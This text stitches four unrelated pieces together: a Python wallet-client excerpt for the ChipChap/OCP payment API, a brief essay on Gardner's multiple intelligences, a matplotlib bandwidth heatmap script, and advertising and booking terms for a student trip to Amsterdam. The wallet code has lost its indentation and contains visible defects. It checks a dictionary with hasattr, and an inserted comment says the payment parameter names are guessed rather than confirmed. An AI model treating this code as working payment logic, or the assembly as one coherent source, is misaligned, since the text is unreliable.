self.client_id = cdata['client_id']
self.client_secret = cdata['client_secret']
self.access_key = cdata['access_key']
self.access_secret = cdata['access_secret']
self.url_new_user = cdata['url_new_user']
self.url_client = cdata['url_client']
self.url_history = cdata['url_history']
self.url_balance = cdata['url_balance']
            if 'ocp_api_key' not in cdata:  # cdata is a dict, so membership is tested with 'in'
                self.ocp_api_key = None
                #raise ValidationError("The API key given by the BotC wallet to this platform is needed (settings).")
                print("WARN: Multiwallet Read-Only! To make payments, the API key given by OCP to the BotC wallet platform is needed (in local_settings).")
                self.logger.error("WARN: Multiwallet Read-Only! To make payments, the API key given by OCP to the BotC wallet platform is needed (in local_settings).")
else:
self.ocp_api_key = cdata['ocp_api_key']
self.logger.info("Connected with an OCP api-key for safe access.")
if not hasattr(cdata, "url_w2w"):
self.url_w2w = None
print("WARN: Multiwallet without W2W permissions! Can't let users pay the shares...")
self.logger.error("WARN: Multiwallet without W2W permissions! Can't let users pay the shares...")
else:
self.url_w2w = cdata['url_w2w']
if not "url_ticker" in cdata:
self.url_ticker = None
print("WARN: Multicurrency without Ticker! Can't process crypto prices (except faircoin)")
self.logger.error("WARN: Multicurrency without Ticker! Can't process crypto prices (except faircoin)")
else:
self.url_ticker = cdata['url_ticker']
#if not "url_tx_json" in cdata:
# self.url_tx_json = None
# print("WARN: Multicurrency without url_tx_json! Can't check crypto payments")
# self.logger.error("WARN: Multicurrency without url_tx_json! Can't check crypto payments")
#else:
# self.url_tx_json = cdata['url_tx_json']
self.url_fair_tx = cdata['url_fair_tx']
else:
self.able_to_connect = False
self.logger.critical("Invalid configuration data to connect.")
@classmethod
def get(cls):
return cls()
@classmethod
def init_logger(cls):
logger = logging.getLogger("multicurrency")
logger.setLevel(logging.WARNING)
if 'log_file' in settings.MULTICURRENCY:
fhpath = settings.MULTICURRENCY["log_file"]
else:
fhpath = "/".join(
[settings.PROJECT_ROOT, "multicurrency.log", ])
fh = logging.handlers.TimedRotatingFileHandler(
fhpath, when="d", interval=1, backupCount=7)
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(asctime)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger
@classmethod
def chipchap_x_signature(cls, access_key, access_secret):
if len(access_secret) % 4:
access_secret += '=' * (4 - len(access_secret) % 4)
nonce = str(randint(0, 100000000))
timestamp = str(int(time.time()))
string_to_sign = access_key + nonce + timestamp
signature = hmac.new(
b64decode(access_secret),
bytes(str(string_to_sign).encode("utf-8")),
hashlib.sha256).hexdigest()
headers = {
'X-Signature': 'Signature access-key="' + access_key +
'", nonce="' + nonce + '", timestamp="' + timestamp +
'", version="2", signature="' + signature + '"'}
return headers
def new_chipchap_user(self, username, email, company_name, password,
repassword):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
self.access_key, self.access_secret)
data = {
'username': username,
'email': email,
'company_name': company_name,
'password': password,
'repassword': repassword,
}
response = requests.post(self.url_new_user, headers=headers, data=data)
if int(response.status_code) == 201:
self.logger.info("New chipchap user request for " + username
+ " has been succesfully processed.")
return response.json()
else:
msg = response.json()
self.logger.critical(
"New chipchap user request for " + username + " has returned "
+ str(response.status_code) + " status code. Error: "
+ response.text)
raise ChipChapAuthError(
'Error ' + str(response.status_code)
+ ': ' + msg['message'], response.text)
def new_client(self, username, password):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
self.access_key, self.access_secret)
data = {
'client_id': self.client_id,
'client_secret': self.client_secret,
'username': username,
'password': password,
}
response = requests.post(self.url_client, headers=headers, data=data)
if int(response.status_code) == 200:
return response.json()
else:
self.logger.critical(
"Authentication request for " + username + " has returned "
+ str(response.status_code) + " status code. Error: "
+ response.text)
raise ChipChapAuthError(
'Error ' + str(response.status_code), response.text)
def wallet_history(self, access_key, access_secret, limit=10, offset=0):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
access_key, access_secret)
params = {
"limit": limit,
"offset": offset,
}
tx_list = requests.get(
self.url_history, headers=headers, params=params)
balance = requests.get(self.url_balance, headers=headers)
if int(tx_list.status_code) == 200 and int(balance.status_code) == 200:
return tx_list.json(), balance.json()
else:
error = str(balance.status_code) + ' and ' + str(
tx_list.status_code)
msg = balance.text + ' and ' + tx_list.text
self.logger.critical("Balance and history requests have returned "
+ error + " status codes. Error: " + msg)
raise ChipChapAuthError('Error ' + error, msg)
def wallet_balance(self, access_key, access_secret):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
access_key, access_secret)
balance = requests.get(self.url_balance, headers=headers)
if int(balance.status_code) == 200:
return balance.json()
else:
error = str(balance.status_code)
msg = balance.text
self.logger.critical("Balance request have returned "
+ error + " status code. Error: " + msg)
raise ChipChapAuthError('Error ' + error, msg)
def send_w2w(self, access_key, access_secret, unit, amount, username, scale):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
access_key, access_secret)
        # The original referenced an undefined `params`; the keys below are
        # assumed from the method signature, not confirmed API field names.
        params = {
            'receiver': username,
            'amount': amount,
            'scale': scale,
        }
        payment = requests.get(self.url_w2w + unit, headers=headers, params=params)
if int(payment.status_code) == 200:
return payment.json()
else:
error = str(payment.status_code)
msg = payment.text
self.logger.critical("Payment w2w request have returned "
+ error + " status code. Error: " + msg)
raise ChipChapAuthError('Error ' + error, msg)
def check_payment(self, access_key, access_secret, unit, txid):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
        mtx = None
        status = None  # stays None if the history request yields nothing
txlist, balance = self.wallet_history(access_key, access_secret, 20)
if txlist:
status = txlist['status']
if status == 'ok':
for tx in txlist['data']['elements']:
if tx['id'] == txid:
mtx = tx
if not mtx:
print("Can't find the mtxid in last 20, search olders??")
self.logger.info("Can't find the mtxid in last 20, search olders??")
if not mtx:
txlist, balance = self.wallet_history(access_key, access_secret, 200)
if txlist:
status = txlist['status']
if status == 'ok':
for tx in txlist['data']['elements']:
if tx['id'] == txid:
mtx = tx
if not mtx:
print("Can't find the mtxid in last 200, search olders??")
self.logger.info("Can't find the mtxid in last 200, search olders??")
return mtx, status
"""
headers = ChipChapAuthConnection.chipchap_x_signature(
access_key, access_secret)
if unit == 'fair':
unit = 'fac'
url = self.url_multi_txs # self.url_fair_tx+txid
else:
url = self.url_tx_json+(unit)+'/'+txid
params = {
'currency': unit,
'id': txid,
}
paycheck = requests.get(
url,
headers=headers)
#params=params)
print("URL: "+str(url))
#print("Headers: "+str(headers))
if int(paycheck.status_code) == 200:
self.logger.debug('Response (200) json:'+str(paycheck.json()))
print('Response (200) json:'+str(paycheck.json()))
return None, paycheck.json() # TODO
else:
error = str(paycheck.status_code)
#msg = paycheck.json()['message'] #json.loads(paycheck.text)
msg = paycheck.text
self.logger.error("Payment check request have returned "+error+" status code. Error: "+msg)
print("Payment check request have returned "+error+" status code. Error: "+msg)
return None, msg
#raise ChipChapAuthError('Error '+error, msg['message'])
"""
|
In 1983 Howard Gardner, a psychologist and professor, developed a theory of multiple intelligences, from which every individual pulls to make up their own individual self. He proposes that each of these intelligences can be enhanced with practice regardless of age, but "intelligences" are generally set by the time a child reaches adolescence (Sadowski, 2008). Gardner's multiple intelligences should not be confused with an individual's learning styles, though it seems as though Gardner has taken the three basic learning styles and expanded upon them. Below are lists of both so one can differentiate between the two theories.
Visual- learning by seeing and looking- executive positions where a vision of the future is important, architects, engineers, and surgeons.
Auditory- learning by hearing and listening- musicians, broadcasters, and language teachers.
Kinesthetic- learn by touching and doing- dancing, acting, construction, or athletics.
As educators of adolescents we have to work with the hand that is dealt us. We have to be open to the multiple intelligences of our students. We should aim to teach to each of these intelligences equally. This does not mean that we have to teach to each intelligence in every single lesson, but rather implement as many ways of learning as possible so that we reach as many students as we can in any given lesson.
Figuring out a variety of ways to present a lesson also helps us, as teachers, to better understand the content that we are delivering to our students (Sadowski, 2008). We develop a deeper understanding as we look to explain materials in a variety of ways in our lessons. We are supposed to be experts in our fields of instruction so that we can effectively pass on knowledge to a younger generation, and what better way to become an expert than to explore as many facets of the content we plan to deliver as we possibly can?
Howard Gardner touches on his theory of multiple intelligences and explains the importance of shifting from a teacher-centered education to one where the students are at the center of learning. In this type of classroom students are able to learn the same content, but through different modes of learning. This type of differentiation is a way of teaching to the multiple intelligences of our students.
Gardner, H. (1999). Intelligence reframed. New York, NY: Basic Books.
Sadowski, M. (2008). Adolescents at school. Cambridge, MA: Harvard Education Press.
|
#
#
# Copyright 2016 Tom Deakin, University of Bristol
#
# This file is part of mega-stream.
#
# mega-stream is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# mega-stream is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with mega-stream. If not, see <http://www.gnu.org/licenses/>.
#
#
# This aims to investigate the limiting factor for a simple kernel, in
# particular cases where bandwidth limits are not reached and latency
# becomes the dominating factor.
#
#
import numpy
import matplotlib.pyplot as plt
data = numpy.zeros((8,5))
data[0] = [71103.0, 114238.5, 94292.4, 92105.7, 52930.6]
data[1] = [147649.4, 223801.5, 251318.1, 227114.9, 196121.0]
data[2] = [252762.3, 311192.7, 294210.3, 227833.1, 185339.1]
data[3] = [310676.5, 395393.0, 302705.0, 195018.7, 0.0]
data[4] = [351479.6, 332399.7, 241249.2, 183720.3, 0.0]
data[5] = [439309.4, 294268.8, 191220.3, 168287.6, 0.0]
data[6] = [411714.6, 212903.5, 167718.5, 0.0, 0.0]
data[7] = [270262.7, 181380.7, 145228.9, 0.0, 0.0]
data *= 1.0E-3
fig, ax = plt.subplots()
plt.pcolor(data, cmap='GnBu')
ax.set_xticks(numpy.arange(data.shape[1]) + 0.5)
ax.set_yticks(numpy.arange(data.shape[0]) + 0.5)
ax.set_xticklabels([4, 8, 16, 32, 64])
ax.set_yticklabels([8, 16, 32, 64, 128, 256, 512, 1024])
ax.set_xlabel('Middle size')
ax.set_ylabel('Inner size')
plt.title('Outer size=64')
cbr = plt.colorbar()
cbr.ax.set_ylabel('Bandwidth GB/s')
# Add data labels
for i in range(data.shape[1]):
for j in range(data.shape[0]):
if (data[j][i] != 0.0):
plt.text(i + 0.5, j + 0.5, '%.1f' % (data[j][i]),
ha='center', va='center',
size='small', color='black', weight='bold')
else:
plt.text(i + 0.5, j + 0.5, '-',
ha='center', va='center',
size='small', color='black', weight='bold')
#fig.set_tight_layout(True)
plt.savefig('heatmap.pdf')
|
Thinkdam is the only student trip to Amsterdam that exclusively brings together thinkers.
Debate teams alongside philosophers, conservatives alongside socialists.
As part of Thinkdam we run a series of small events all over the city, in a variety of locations. Discuss moral philosophy in a coffeeshop, debate the death penalty in a coffee shop (coffeeshop and coffee shop are different, trust us), or discuss the benefits of capitalism in a Brown Cafe (the Dutch traditional pub).
All the events are included in your ticket, so you can choose as many of the events as you are interested in.
Karl Marx or Adam Smith?
As the home of huge businesses but also one of the strongest safety nets in Europe, Amsterdam might be a utopian middle ground for the more politically motivated. Or maybe you disagree... We're running small discussion events so you can solve politics once and for all.
All events are included in your ticket. Feel free to join and watch, or to debate.
Thinkdam brings you together with the brightest minds, and presents the most interesting thoughts. You will have opportunities to meet new people on our executive coaches, at our awesome hostel, or at one of our many events.
Holland’s capital is one of the most visited cities in Europe, and for good reason! Visit the world class museums, cruise along the UNESCO world heritage canals and even visit the city’s famous red-light district! Join us on a legendary bar crawl through Amsterdam, where we’ll take you to the best bars and clubs in the city!
After arriving at your university’s pick-up point, you can kick back and relax on one of our super comfy coaches. We’ll be leaving London at 10pm and heading down to Dover.
Arrive in Amsterdam city centre in the morning and drop off your bags at the hostel. You’ll have the morning to grab some breakfast and look around Amsterdam, and we’ll show you the best places to go and see. In the afternoon join us in a lively discussion event at one of Amsterdam’s famous 'Coffee Shops'. We’ll be facilitating the discussion event and will send out the planned topics before the trip; it’s a great chance to get to know other debating and philosophy societies. In the evening you’ll have more free time to explore Amsterdam by night and check out local restaurants, bars and other evening attractions before coming back to the Hans Brinker hostel in the city centre.
Enjoy a free breakfast at the hostel; you’ll have the morning to yourselves. We recommend visiting some of Amsterdam’s world class museums and galleries. Join us for a debate event in the afternoon. We’ll be sending out the topics before the trip to give you time to prepare, so bring your A game! In the evening you can join us for a legendary bar crawl around some of Amsterdam’s best bars and clubs; this is not one to miss!
Thinkdam will be taking over the Hans Brinker, which famously sells itself as the world's worst hostel! (We can assure you it’s not.) It’s right in the city centre so you don’t have to worry about transport anywhere! We are sure you will enjoy the comfy beds, cheap pints and underground club in the hostel; it has a super friendly environment and is great for meeting new people.
You will need to pay the remainder of the trip balance by May 22, 2019.
You (hereafter referred to as 'you' or 'the guest') are forming this contract with Awesome Trip Ltd (hereafter referred to as 'AwesomeTrip'), of registered address 21 Shoreditch House, Charles Square, London, N1 6HL. Awesome Trip Ltd trades as Thinkdam.
Full payment for the trip must be received on or before May 22, 2019. If you fail to make full payment by this date your trip may be cancelled by AwesomeTrip with no refund given.
|